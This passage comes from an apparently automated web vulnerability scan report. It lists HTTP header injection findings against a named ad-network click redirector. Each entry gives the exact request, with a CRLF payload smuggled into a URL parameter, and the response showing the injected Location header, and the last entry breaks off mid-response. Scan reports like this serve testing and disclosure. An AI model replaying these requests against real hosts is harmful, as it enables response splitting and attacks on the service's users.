3.50. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 9300b%0d%0a0bad28ce6f1 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/9300b%0d%0a0bad28ce6f1/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:18 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/9300b
0bad28ce6f1
/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.51. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 9 is copied into the Location response header. The payload 64110%0d%0a7baeb896275 was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/64110%0d%0a7baeb896275/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:34 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/64110
7baeb896275
/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.52. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr request parameter is copied into the Location response header. The payload 7f89d%0d%0a3c0d66486b9 was submitted in the http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=7f89d%0d%0a3c0d66486b9 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:07 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=7f89d
3c0d66486b9

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.53. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 360e7%0d%0ab239a5c1971 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?360e7%0d%0ab239a5c1971=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:11 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?360e7
b239a5c1971
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.54. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [7987e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The value of the 7987e request parameter is copied into the Location response header. The payload 308ef%0d%0a21d4ff118f0 was submitted in the 7987e parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/?7987e308ef%0d%0a21d4ff118f0 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://burp/show/25
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=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

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:42 GMT;
Content-Type: text/html
Location: ?7987e308ef
21d4ff118f0

Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

3.55. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 7987e%0d%0a05abc341081 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/?7987e%0d%0a05abc341081=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:15 GMT;
Content-Type: text/html
Location: ?7987e
05abc341081
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.56. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 87fcc%0d%0a3c02d47cd03 was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/;ord=87fcc%0d%0a3c02d47cd03 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:16 GMT;
Content-Type: text/html
Location: ;ord=87fcc
3c02d47cd03

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.57. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6ee78%0d%0a4697cd0fdb4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/6ee78%0d%0a4697cd0fdb4/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:19 GMT;
Content-Type: text/html
Location: 6ee78
4697cd0fdb4
/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.58. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d2c58%0d%0a02f5864db6e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/d2c58%0d%0a02f5864db6e/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:34 GMT;
Content-Type: text/html
Location: http:/d2c58
02f5864db6e
/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.59. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 61e23%0d%0a6f34d91a354 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/61e23%0d%0a6f34d91a354/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:50 GMT;
Content-Type: text/html
